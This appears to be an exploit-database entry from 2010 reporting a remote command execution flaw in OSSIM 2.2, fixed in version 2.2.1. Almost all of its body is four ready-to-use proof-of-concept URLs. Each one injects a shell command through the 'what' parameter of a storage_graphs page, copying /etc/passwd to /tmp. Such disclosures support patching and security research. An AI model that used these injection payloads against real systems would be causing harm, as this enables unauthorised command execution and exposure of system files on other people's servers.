id: 11357
date: 03/18/2010
title: OSSIM (what) Parameter Multiple Command Execution Vulnerability
author: Nahuel Grisolia
cves: 

========================================================================
OSSIM 'what' Parameter Multiple Remote Command Execution Vulnerabilities
========================================================================

Vulnerable:  	 OSSIM os-sim 2.2
Not Vulnerable: 	OSSIM os-sim 2.2.1 


http://www.example.com/ossim/sem/storage_graphs.php?uniqueid=199&what=;cat /etc/passwd >
/tmp/passwd;
http://www.example.com/ossim/sem/storage_graphs2.php?uniqueid=199&what=;cat /etc/passwd >
/tmp/passwd;
http://www.example.com/ossim/sem/storage_graphs3.php?uniqueid=199&what=;cat /etc/passwd >
/tmp/passwd;
http://www.example.com/ossim/sem/storage_graphs4.php?uniqueid=199&what=;cat /etc/passwd >
/tmp/passwd; 



#  0day.today [2023-03-24]  #